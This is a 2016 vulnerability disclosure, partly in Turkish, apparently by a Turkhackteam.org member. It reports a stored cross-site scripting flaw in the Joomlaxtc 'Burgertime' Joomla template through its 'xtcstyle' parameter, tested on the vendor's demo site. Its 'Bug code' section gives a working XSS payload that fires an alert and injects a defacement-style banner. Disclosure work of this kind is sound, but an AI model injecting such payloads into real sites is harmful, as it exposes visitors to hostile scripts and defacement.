Joomlaxtc Template Burgertime Cross Site Scripting Stored Vulnerability

# Application Name : Joomlaxtc Template Burgertime Cross Site Scripting Stored  Vulnerability

# Vulnerable Type : Cross Site Scripting Stored

# Vendor Homepage : http://www.joomlaxtc.com

# Author : Turkhackteam.org | Bug Researchers | €r@y

# Tested on Demo Site : http://demo.joomlaxtc.com/burgertime/

# Author Contact : http://www.turkhackteam.org/members/745069.html

# Date : 20.06.2016

# Explanation ( Açıklama )

Joomlaxtc.com sitesinde yayınlanan, joomla sitelere ait templatede bulunan, "Cross Site Scripting" zafiyeti demo site üzerinde tespit edilmiştir. Zafiyet aşağıda verilmiş script kodunun, http://demo.joomlaxtc.com/burgertime/?xtcstyle= parametresine eklenerek, http://demo.joomlaxtc.com/burgertime/ sayfasında alert verdiğini görüyoruz. Yani siteye giren her kullanıcı bu zafiyetten etkilenmektedir. Sitenin herhangi bir sayfasına tıklandığında, alert verecektir.  Bu da açığın, "XSS Stored" olduğunu göstermektedir.

#############################################################

< ----------------- Bug code start -------------------- >

">**********alert("Cross-Site-Scripting%20Bug%20Researchers%20Turkhackteam.org%20/%20€r@y");</script><marquee><font%20size="4"%20color="red"%20face="Candice"%20><big><i>Cross-Site-Scripting%20Bug%20Researchers%20Turkhackteam.org%20/%20€r@y</i></big></font></marquee>

<------------------ Bug code end of ------------------- >